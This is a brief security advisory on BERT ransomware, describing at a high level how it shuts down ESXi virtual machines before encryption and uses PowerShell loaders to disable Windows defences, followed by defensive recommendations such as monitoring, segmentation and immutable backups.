BERT Ransomware Threatens ESXi Virtual Machine
BERT Ransomware, a new type of ransomware, has recently been identified as the main cause of attacks targeting virtualization technology like ESXi in businesses, causing significant damage to organizations and severely hindering system recovery efforts.
Detailed Information
BERT Ransomware - also known as "Water Pombero," is a hacker group that emerged in April 2025, primarily targeting virtualization systems, databases, and storage servers of organizations in the healthcare, technology, and events sectors across Asia, Europe, and the Americas.
In the latest security report, this ransomware has been enhanced and has become more dangerous due to new mechanisms in the Linux version. Specifically, this ransomware has developed the ability to detect and force Linux virtual machines in ESXi to shut down before encrypting all data within the affected virtual machines. This ensures that the targeted virtual machines cannot operate during the attack, thereby preventing any incident response efforts from administrators.
Figure 1: Malware executing commands to force virtual machines in the system to stop operating - Source: CyberSecurityNews
In addition to its ability to attack multiple platforms on Windows, Linux, and ESXi systems, BERT ransomware can support up to 50 simultaneous encryption threads, enhancing its processing capability in large-scale virtualization environments.
For Windows systems, BERT uses PowerShell scripts as loaders to disable default security features like Windows Defender, firewall, UAC, etc., before downloading the main payload from the C2 server.
Figure 2: Malware PowerShell script disabling default security features on Windows - Source: CyberSecurityNews
Mitigation & Recommendations
Advanced PowerShell Monitoring: Monitor scripts running on PowerShell to detect loaders that disable security tools like firewalls, Windows Defender, and UAC early.
Network Segmentation: Isolate the ESXi management interface from the rest of the system to reduce the risk of spreading when a server is compromised.
Strengthen Virtualization Infrastructure Defense: Enhance security solutions for platforms like VMware ESXi and virtual servers.
Data Backup: Use measures like offline backups or immutable backups to protect against ransomware encrypting or deleting data.
